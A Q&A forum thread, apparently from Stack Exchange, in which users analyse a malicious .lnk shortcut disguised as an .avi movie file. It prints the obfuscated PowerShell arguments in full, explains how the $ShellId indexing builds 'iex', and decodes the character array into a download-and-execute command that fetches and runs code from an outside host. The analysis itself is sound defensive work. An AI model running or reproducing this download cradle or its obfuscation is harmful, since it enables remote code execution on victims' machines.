2

I downloaded a file which I almost didn't think twice over, but the target (of the shortcut) caught my eye:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]

There's no doubt that something fishy is going on here. I understand the first three parameters, but what I couldn't quite figure out is how code of a payload like this would work in just a basic shortcut?

Improve this question
2
  • Well when you click on it its running . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code] But i dont think i really understand what you are asking
    – ArcSet
    Commented Nov 3, 2018 at 4:57
  • The first part of the code, represented by the decimal numbers, is "$aspx =". You can identify the rest using asciitable.com.
    – lit
    Commented Nov 3, 2018 at 15:43

2 Answers 2

Reset to default
5

My guess, it runs a Powershell with

  • NoProfile
  • WindowStyle 1 = Minimized
  • ExecutionPolicy ByPass = Nothing is blocked and there are no warnings or prompts
  • then dot-sources the remaining code

Let's split this code up:

( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]

$ShellId is a built-in Powershell variable:

  >$ShellId
  Microsoft.PowerShell

So ( $shelliD[1]+$SHeLlID[13]+'x') transforms to iex (= Invoke-Expression)

The rest of the code is ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]. I gues the char array contains ascii characters. If so, we can transform it to:

$aspx =

Summary:

powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy ByPass . iex "$aspx = ...."

So it invokes the code starting with $aspx = in a minimized Powershell window without warnings or prompts.

Maybe the code ran through one of these obfuscation methods.

Hope that helps.

Improve this answer
1
  • @aaron1312, if the above proposal is fine for you, please mark my solution as the answer. Thx
    – Moerwald
    Commented Nov 3, 2018 at 16:00
1

I got the same. The file looked like a AVI and I opened it quickly to check the quality of the movie. It was actually a well-disguised shortcut: 

PS C:\Users\pharg\Downloads\tv> $sh = New-Object -COM WScript.Shell
PS C:\Users\pharg\Downloads\tv> $target = $sh.CreateShortcut('C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p
.XviD.AC3-EcHO.avi.lnk')
PS C:\Users\pharg\Downloads\tv> $target

FullName         : C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p.XviD.AC3-EcHO.avi.lnk
Arguments        : -NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115,
                   112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116,
                   101 ,109,46 ,78 , 101, 116, 46,87 ,101,98 , 67 ,108,105,101,110 ,116,41, 41 , 46, 68,
                   111,119,110,108, 111 , 97 , 100, 83,116, 114 ,105 ,110,103,40, 39 , 104, 116 ,116,112 ,58,47, 47
                   ,122, 118 , 98 ,46,117, 115 ,47,49 ,39 ,41, 59 ,73 , 69 , 88, 32 ,36, 97, 115 ,112 , 120 ) ) )
Description      : .avi
Hotkey           :
IconLocation     : C:\WINDOWS\System32\imageres.dll,18
RelativePath     :
TargetPath       : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WindowStyle      : 7
WorkingDirectory : %SYSTEMROOT%\System32\WindowsPowerShell\v1.0

The target here translates to:

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

I opened http://zvb.us/1 and it seems I have had some code run on my PC. At this point, I am not sure what has happened. No symptoms...

Improve this answer

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Not the answer you're looking for? Browse other questions tagged or ask your own question.